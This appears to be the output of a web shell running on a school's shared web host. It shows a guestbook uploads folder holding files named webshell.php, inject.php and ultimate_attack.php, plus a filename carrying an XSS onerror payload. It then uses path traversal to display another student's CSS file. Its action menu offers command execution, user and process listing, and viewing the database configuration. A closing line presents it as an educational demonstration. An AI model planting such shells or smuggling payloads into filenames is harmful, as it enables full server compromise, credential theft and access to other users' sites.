🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../587070.klas4s23.mid-ica.nl/public_html/l2-pro-3-gamecraft-codemakers/stylesRoan.css

* {
    box-sizing: border-box;
  
  }
  body {
    margin: 0;
    padding: 0;
    font-family: 'Saira', sans-serif;
    font-size: 10px;
  }
  
  @font-face {
    font-family: "main";
    src: url('fonts/Montserrat-Light.ttf');
  }
  
  @font-face {
    font-family: "subhead";
    src: url('fonts/BebasNeue-Regular.ttf');
  }
  
  @font-face {
    font-family: "mainhead";
    src: url('fonts/square_sans_serif_7.ttf');
  }
  
  @font-face {
    font-family: "maintext";
    src: url('fonts/Montserrat-Light.ttf');
  }
  
  .gridContainer {
    display: grid;
    grid-template-columns: 1fr 1fr 1fr 1fr 1fr 1fr 1fr 1fr 1fr 1fr;
    grid-template-rows: 45px 45px 1fr 1fr 1fr 1fr 1fr 1fr 1fr 1fr;
    gap: 0px 0px;
    grid-auto-flow: row;
    grid-template-areas:
      "header header header header header header header header header header"
      "header header header header header header header header header header"
      "gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent"
      "gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent"
      "gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent"
      "gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent"
      "gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent"
      "gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent"
      "gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent"
      "gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent gameContent";
    height: 100vh;
    width: 100vw;
    overflow-y: hidden;
    overflow-x: hidden;
  }
  
  #canvas {
    grid-area: gameContent;
    width: 100%;
    height: 100%;
    /* background-color: lightblue; */
    background-image: url('images/starBG.jpg');
  }
  
  /* .reset-button {
    grid-area: header;
    display: flex;
    justify-content: flex-start;
    align-items: center;
    margin-left: 2rem;
  } */
  
  .header {
    grid-area: header;
    display: flex;
    justify-content: space-between;
    align-items: center;
  }
  
  .header h1 {
    color: #000000;
    font-family: 'main', sans-serif;
    letter-spacing: 1rem;
    font-size: 3rem;
    width: 100%;
    display: flex;
    margin-left: 1rem;
  }
  
  .gameContent {
    grid-area: gameContent;
  }
  
  /* .resetButton {
    background-color: rgb(0, 0, 0);
    color: rgb(255, 255, 255);
    border: red 0.2rem solid;
    margin-right: 1rem;
    padding: 0.6rem;
    font-family: main;
    font-size: 1rem;
    text-wrap: nowrap;
  }
  
  .resetButton:hover {
    background-color: red;
    color: white;
    border: red 0.2rem solid;
    margin-right: 1rem;
    padding: 0.6rem;
    cursor: pointer; */
  /* } */
  
  .navbar {
    grid-area: header;
    display: flex;
    justify-content: flex-end;
    align-items: center;
  }
  
  .navbar a {
    color: #ffffff;
    font-family: 'main', sans-serif;
    /* font-size: 1.5rem; */
    width: 100%;
    display: flex;
    text-decoration: none;
  }
  
  .navbar ul {
    display: flex;
    justify-content: flex-end;
    align-items: center;
    list-style: none;
  }
  
  nav button {
    background-color: rgb(0, 0, 0);
    color: rgb(255, 255, 255);
    border: #dc133b 0.2rem solid;
    border-radius: 0.3rem;
    margin-right: 1rem;
    padding: 0.6rem;
    font-family: main;
    font-size: 1.5rem;
    text-wrap: nowrap;
  }
  
  nav button:hover {
    background-color: #dc133b;
    color: white;
    border: #dc133b 0.2rem solid;
    margin-right: 1rem;
    padding: 0.6rem;
    cursor: pointer;
  }
  
  .manualContent {
    color: #ffffff;
    width: 50%;
    margin-left: 1.2rem;
  }
  
  .manualContent h1 {
    font-family: 'subhead', sans-serif;
    font-size: 2.5rem;
    margin-top: 1rem;
  }
  
  .manualContent h2 {
    font-family: 'main', sans-serif;
    font-size: 1.5rem;
    margin-top: 1rem;
  }
  
  .manualContent p {
    font-family: 'maintext', sans-serif;
    font-size: 1.2rem;
    margin-top: 1rem;
  }
  
  .manualContent li {
    font-family: 'maintext', sans-serif;
    font-size: 1.2rem;
    margin-top: 1rem;
  }
  
  #logo {
    width: 35rem;
    height: auto;
    margin-left: 1rem;
  }
  
  .clrAccent {
    color: #dc133b;
  }
  
  #canvas {
    display: block;
  }

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!